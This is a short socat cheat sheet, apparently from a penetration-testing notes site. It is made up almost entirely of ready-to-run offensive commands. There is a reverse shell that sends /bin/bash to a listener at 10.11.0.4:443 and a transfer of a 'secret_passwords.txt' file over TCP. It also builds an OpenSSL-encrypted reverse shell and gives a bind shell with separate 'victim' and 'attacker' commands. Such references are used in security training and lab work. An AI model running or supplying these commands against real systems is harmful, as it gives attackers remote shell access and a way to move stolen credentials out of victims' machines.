Socat

Reverse Shell

Listen:

sudo socat -d -d TCP4-LISTEN:443 STDOUT

Connect:

socat TCP4:10.11.0.4:443 EXEC:/bin/bash

send file:

sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt

socat TCP4:10.11.0.4:443 file:received_secret_passwords.txt,create

Encrypted Rev Shell:

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt

cat bind_shell.key bind_shell.crt > bind_shell.pem

sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

connect:

socat - OPENSSL:10.11.0.4:443,verify=0

Bind Shell

Victim:

socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane

attacker:

socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337

PreviousWinRM// PowerShellNextPython

Last updated